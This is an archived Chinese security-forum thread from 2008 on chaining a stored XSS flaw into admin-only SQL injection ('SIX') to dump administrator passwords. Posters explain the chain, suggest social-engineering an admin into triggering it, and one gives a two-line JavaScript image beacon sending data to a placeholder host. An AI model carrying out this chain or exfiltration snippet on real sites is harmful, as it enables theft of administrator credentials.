[讨论]xss-->crsf-->six
[讨论]xss-->crsf-->six议题作者:落叶纷飞
信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com/]www.eviloctal.com[/url])
郁闷了,大家能讨论下six技术么?
现在网上就superhei的一篇文章~~一半懂一半不懂的.....
晕啦~
国外的也只能看懂一点
大家讨论下,如果一个系统有后台注入(假设mssql数据库),前台也有一个跨站,该怎么利用呢?
先不考虑直接update密码和挂马,盗cookies等
从six角度我们可以用select语句爆出网站管理员的密码,然后再把返回的页面保存到我们外部链接的一个网站里,这只是想,具体该怎么实现啊?主要是保存返回页面到我们外部连接的网站上这个代码该怎么写.....[img]http://forum.eviloctal.com/images/smilies/yangcong/64.gif[/img]小鸡鸡重出江湖了~~!!
帖子119 精华[url=http://forum.eviloctal.com/digest.php?authorid=133543]0[/url] 积分3244 阅读权限100 性别男 在线时间144 小时 注册时间2007-7-31 最后登录2008-7-21 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=133543]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=风水&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]良辰择日,预测咨询,公司改名,权威易经[/url]
[url=http://forum.eviloctal.com/space-uid-151566.html]heige[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 SendUrl(m[1]);
这个可以用img 把m[1] 发给你接收的asp等
帖子6 精华[url=http://forum.eviloctal.com/digest.php?authorid=151566]0[/url] 积分23 阅读权限40 性别男 在线时间16 小时 注册时间2007-12-6 最后登录2008-2-1 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=151566]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=猎头&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]您知道您年薪应是多少?[/url]
[url=http://forum.eviloctal.com/space-uid-151566.html]heige[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 有的不一定要xss xsrf也行 还有不一定是sqlinj 也可以实现后台的功能 比如备用shell什么的 也行,six只是提供一个思路 :)
帖子6 精华[url=http://forum.eviloctal.com/digest.php?authorid=151566]0[/url] 积分23 阅读权限40 性别男 在线时间16 小时 注册时间2007-12-6 最后登录2008-2-1 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=151566]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=鲜花预定&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]爱要怎么说出口[/url]
[url=http://forum.eviloctal.com/space-uid-72637.html]28度的冰[/url] [img]http://forum.eviloctal.com/images/avatars/11.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 如果是mssql,同时权限是sa。
能用几句SQL搞定的那就简单了。
xmlhttp post就post get就get
加上用户,就可以进去爽了。
如果database owner,那么可以考虑...算了,基本上不可以考虑。
access基本没用。不过我倒是有个想法,通过xmlhttp(用一个定时器),一方面注入后台,一方面到我们自己的页面1去读取注入语句,一方面提交注入结果到页面2。感觉累死了。而且,这样需要的javascript代码也很多,还是不好。
这个东西对开源的cms还是有一定用处的。I love amethyst!
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url]
帖子177 精华[url=http://forum.eviloctal.com/digest.php?authorid=72637]0[/url] 积分3622 阅读权限100 性别男 来自浙江 在线时间215 小时 注册时间2007-1-18 最后登录2008-7-21 [url=http://www.28ice.com/]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=72637]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-123726.html]inking[/url] [img]http://forum.eviloctal.com/customavatars/123726.jpg[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 引用:
引用第0楼落叶纷飞于2008-01-21 14:09发表的 [讨论]xss-->crsf-->six :
议题作者:落叶纷飞
信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com]www.eviloctal.com[/url])
主要是保存返回页面到我们外部连接的网站上这个代码该怎么写
.......
这个的话如果select成功,就直接document.write一个iframe标签到你的网站,通过url参数传递结果不就行了Inking's Blog http://www.inkings.cn
帖子64 精华[url=http://forum.eviloctal.com/digest.php?authorid=123726]0[/url] 积分3162 阅读权限100 在线时间116 小时 注册时间2007-5-26 最后登录2008-7-15 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=123726]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-66180.html]kking[/url] [img]http://forum.eviloctal.com/images/avatars/pw/eviloctal2.gif[/img]
晶莹剔透§烈日灼然 Sql-injection In Xss ?
现在的人真奇怪,什么方法都要给个名字,话说这方法我自己想出来都用过了,今天才知道原来它叫SIX?
好吧,很简单,让我们假设有这样一个CMS(这个CMS确实存在,这里不暴光了)
在前台修改用户资料处写入的数据没有过滤XSS,但是在前台个人信息显示、用户信息查看、论坛用户信息显示等所有地方在输出的时候都进行了HTML过滤,但是在后台用户信息编辑的地方缺没有过滤(很多系统的前台和后台是分别的人开发的)。
在后台某个操作传参数的地方没有进行SQL检测,但该页面必须要管理员权限,而且后台需要验证COOKIES SESSION IP 三重机制。
那么我的做法是写JS AJAX脚本访问后台的该页面,并且将获得的页面结果再通过XMLHTTP发送到我的指定页面做POST提交保存路径及返回数据,这些都可以用AJAX来完成,代码就不写了,情况不一样代码也不一样,因为在个人用户信息编辑的地方仅仅做了 INPUT 的长度限制,而没有在 REQUEST 处做截取,所以我们可以写很长的JS代码提交过去。
就这样,然后用社工骗管理员去修改你的密码事,AJAX 代码会自动注入,然后将返回信息POST到你设置的页面中,当然如果站点是SQL数据库,那么直接UPDATE ADMIN PASSWORD,否则就写循环的AJAX 代码,不过这样会导致IE卡住。
这些是在白盒情况下的,如果是黑盒,可以仿造明小子 及 啊D 软件一样直接用JS获得当前URL,然后用蜘蛛方式所有可用URL进行检测,一旦发现注入点就自动POST到指定位置该注入点URL及返回信息。
不晓得我说清楚了没…http://www.vtwo.cn
帖子54 精华[url=http://forum.eviloctal.com/digest.php?authorid=66180]0[/url] 积分127 阅读权限40 性别男 在线时间25 小时 注册时间2006-10-9 最后登录2008-3-14 [url=http://www.vtwo.cn]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=66180]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-133543.html]落叶纷飞[/url] [img]http://forum.eviloctal.com/images/avatars/06.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 引用:
引用第1楼heige于2008-01-21 21:45发表的 :
SendUrl(m[1]);
这个可以用img 把m[1] 发给你接收的asp等
谢谢superhei大哥回复啊,可以写个例子给我看看吗?
我太笨了,想了半天也不知道怎么写小鸡鸡重出江湖了~~!!
帖子119 精华[url=http://forum.eviloctal.com/digest.php?authorid=133543]0[/url] 积分3244 阅读权限100 性别男 在线时间144 小时 注册时间2007-7-31 最后登录2008-7-21 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=133543]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-133543.html]落叶纷飞[/url] [img]http://forum.eviloctal.com/images/avatars/06.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 引用:
引用第5楼kking于2008-01-22 16:39发表的 :
Sql-injection In Xss ?
现在的人真奇怪,什么方法都要给个名字,话说这方法我自己想出来都用过了,今天才知道原来它叫SIX?
好吧,很简单,让我们假设有这样一个CMS(这个CMS确实存在,这里不暴光了)
在前台修改用户资料处写入的数据没有过滤XSS,但是在前台个人信息显示、用户信息查看、论坛用户信息显示等所有地方在输出的时候都进行了HTML过滤,但是在后台用户信息编辑的地方缺没有过滤(很多系统的前台和后台是分别的人开发的)。
.......
谢谢这位大哥回复,我现在烦的是怎么把返回的信息post到我自己的网站上
写段代码例子给我参考下好吗?我实在太蠢了,老是想不出好的方法[img]http://forum.eviloctal.com/images/smilies/yangcong/04.gif[/img]小鸡鸡重出江湖了~~!!
帖子119 精华[url=http://forum.eviloctal.com/digest.php?authorid=133543]0[/url] 积分3244 阅读权限100 性别男 在线时间144 小时 注册时间2007-7-31 最后登录2008-7-21 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=133543]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-104416.html]zj1244[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 引用:
引用第6楼落叶纷飞于2008-01-23 10:16发表的 :
谢谢superhei大哥回复啊,可以写个例子给我看看吗?
.......
dataimg=new Image();
dataimg.scr="http://xxx.com/x.asp?data=" + jjyy;
帖子5 精华[url=http://forum.eviloctal.com/digest.php?authorid=104416]0[/url] 积分17 阅读权限40 性别男 在线时间150 小时 注册时间2007-4-9 最后登录2008-6-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=104416]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-151566.html]heige[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 引用:
引用第5楼kking于2008-01-22 16:39发表的 :
Sql-injection In Xss ?
现在的人真奇怪,什么方法都要给个名字,话说这方法我自己想出来都用过了,今天才知道原来它叫SIX?
好吧,很简单,让我们假设有这样一个CMS(这个CMS确实存在,这里不暴光了)
在前台修改用户资料处写入的数据没有过滤XSS,但是在前台个人信息显示、用户信息查看、论坛用户信息显示等所有地方在输出的时候都进行了HTML过滤,但是在后台用户信息编辑的地方缺没有过滤(很多系统的前台和后台是分别的人开发的)。
.......
郁闷~~,也太打击人了,好不容易上est想出个名啥的,就被bs了,我要去黑了你的bink
帖子6 精华[url=http://forum.eviloctal.com/digest.php?authorid=151566]0[/url] 积分23 阅读权限40 性别男 在线时间16 小时 注册时间2007-12-6 最后登录2008-2-1 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=151566]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-157489.html]瓜哥[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 [img]http://forum.eviloctal.com/images/smilies/yangcong/58.gif[/img]
帖子2 精华[url=http://forum.eviloctal.com/digest.php?authorid=157489]0[/url] 积分9 阅读权限40 在线时间2 小时 注册时间2008-1-23 最后登录2008-1-30 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=157489]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-133543.html]落叶纷飞[/url] [img]http://forum.eviloctal.com/images/avatars/06.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 引用:
引用第8楼zj1244于2008-01-23 10:49发表的 :
dataimg=new Image();
dataimg.scr="http://xxx.com/x.asp?data=" + jjyy;
谢谢小葵大哥小鸡鸡重出江湖了~~!!
帖子119 精华[url=http://forum.eviloctal.com/digest.php?authorid=133543]0[/url] 积分3244 阅读权限100 性别男 在线时间144 小时 注册时间2007-7-31 最后登录2008-7-21 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=133543]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-3278.html]茄子宝[/url] [img]http://forum.eviloctal.com/customavatars/3278.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 你们怎么都不仔细看黑锅的文章捏[img]http://forum.eviloctal.com/images/smilies/yangcong/58.gif[/img]
话说我已经把黑锅的BLOG黑了~
[url=http://superhei.blogbus.com/]http://superhei.blogbus.com/[/url]..... -.= 凸
[url=http://wpa.qq.com/msgrd?V=1&Uin=30039780&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子160 精华[url=http://forum.eviloctal.com/digest.php?authorid=3278]4[/url] 积分3923 阅读权限100 性别男 在线时间403 小时 注册时间2005-4-4 最后登录2008-6-16 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=3278]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-66180.html]kking[/url] [img]http://forum.eviloctal.com/images/avatars/pw/eviloctal2.gif[/img]
晶莹剔透§烈日灼然 引用:
引用第9楼heige于2008-01-23 11:53发表的 :
郁闷~~,也太打击人了,好不容易上est想出个名啥的,就被bs了,我要去黑了你的bink
你是谁?知道我马甲的人可不多。。。
只怪你运气不好,我最近几个月难的上来溜达一下,哎。。
我那小站,想黑就去吧,不过如果你旁注或者从服务器进来的话我可不承认哦,要从脚本上黑,过两天我把站开起来欢迎你光临嘛。。http://www.vtwo.cn
帖子54 精华[url=http://forum.eviloctal.com/digest.php?authorid=66180]0[/url] 积分127 阅读权限40 性别男 在线时间25 小时 注册时间2006-10-9 最后登录2008-3-14 [url=http://www.vtwo.cn]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=66180]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-66180.html]kking[/url] [img]http://forum.eviloctal.com/images/avatars/pw/eviloctal2.gif[/img]
晶莹剔透§烈日灼然 引用:
引用第7楼落叶纷飞于2008-01-23 10:19发表的 :
谢谢这位大哥回复,我现在烦的是怎么把返回的信息post到我自己的网站上
.......
XMLHTTP 以POST方式提交表单数据的例子网上很多,自己去改改就行了,代码不长,也就百多字而已。http://www.vtwo.cn
帖子54 精华[url=http://forum.eviloctal.com/digest.php?authorid=66180]0[/url] 积分127 阅读权限40 性别男 在线时间25 小时 注册时间2006-10-9 最后登录2008-3-14 [url=http://www.vtwo.cn]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=66180]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-157489.html]瓜哥[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 [img]http://forum.eviloctal.com/images/smilies/yangcong/57.gif[/img]
帖子2 精华[url=http://forum.eviloctal.com/digest.php?authorid=157489]0[/url] 积分9 阅读权限40 在线时间2 小时 注册时间2008-1-23 最后登录2008-1-30 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=157489]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-151566.html]heige[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然
页:
[1]